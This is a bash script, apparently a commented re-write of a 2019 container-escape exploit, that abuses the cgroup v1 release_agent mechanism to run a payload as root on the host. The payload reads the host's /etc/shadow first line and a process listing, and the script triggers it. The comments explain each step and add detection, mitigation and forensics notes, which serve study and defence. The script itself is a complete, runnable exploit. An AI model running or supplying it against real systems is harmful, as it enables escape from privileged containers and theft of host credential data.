#!/bin/bash
# This is a re-write of Felix Wilhelm's exploit from 2019.
# The original Tweet (and code) can be found at:
# https://twitter.com/_fel1x/status/1151487051986087936
# Container-side path of the cgroup v1 "rdma" controller hierarchy.
# Every later step writes below this path, so the script only works where
# cgroupfs is mounted read-write inside the container. That is the first
# thing to check when assessing whether a container is exposed.
rdma=/sys/fs/cgroup/rdma
# Create a child cgroup named "w": making a directory inside a cgroup v1
# hierarchy creates a new cgroup with its own control files.
mkdir -p $rdma/w
# Ask the kernel to invoke the hierarchy's release_agent once the last task
# leaves cgroup "w" (cgroup v1 notify_on_release semantics).
echo 1 >$rdma/w/notify_on_release
# Extract the "upperdir=" mount option from /etc/mtab. For an overlay root
# filesystem this is the host-side directory that backs the container's
# writable layer, i.e. where files created in the container land on the host.
upperdir=`sed -rn 's/.*upperdir=([^,]*).*/\1/p' /etc/mtab`
# Register <upperdir>/cmd as the hierarchy's release_agent. The kernel runs
# the release agent on the host, as root, outside the container's namespaces,
# so this single write is where the container boundary is crossed.
# Detection: alert on any write to a cgroup release_agent or
# notify_on_release file originating from a container process.
# Mitigation: the write typically only succeeds in a privileged container
# (writable cgroupfs, CAP_SYS_ADMIN); keep cgroupfs read-only, avoid
# --privileged, and prefer cgroup v2, which has no release_agent.
echo $upperdir/cmd > $rdma/release_agent
# Start the payload script at /cmd in the container's root. The path
# registered as release_agent (<upperdir>/cmd) is expected to resolve to this
# same file on the host through the overlay upper layer.
echo '#!/bin/sh' > /cmd;
# Payload line 1: write the first line of /etc/shadow to <upperdir>/utdata.
# $upperdir is expanded now (double quotes), so the payload holds the literal
# host path. Because the agent executes on the host, the file read is the
# host's /etc/shadow, which demonstrates root-level read access there.
# Forensics: /cmd and /utdata in the container's writable layer are the
# on-disk artifacts this script leaves behind.
echo "head -n 1 /etc/shadow > $upperdir/utdata" >> /cmd
# Payload line 2: append a process listing to the same output file. Host
# processes in that listing show the payload ran outside the container's
# PID namespace.
echo "ps >> $upperdir/utdata" >> /cmd
# Mark the payload executable; the kernel executes the release_agent path
# directly.
chmod +x /cmd
# Trigger: a short-lived child shell writes 0 to cgroup.procs, which moves
# the writing process itself into cgroup "w". When that child exits, the
# cgroup becomes empty and the kernel invokes the registered release_agent.
# A separate process is used so that this script's own shell never joins "w".
/bin/bash -c "echo 0 > $rdma/w/cgroup.procs"
# Give the kernel-spawned agent time to run and write its output file.
sleep 3
# Print the payload's output, read back through the container's own view of
# the overlay upper layer (/utdata here is <upperdir>/utdata on the host).
cat /utdata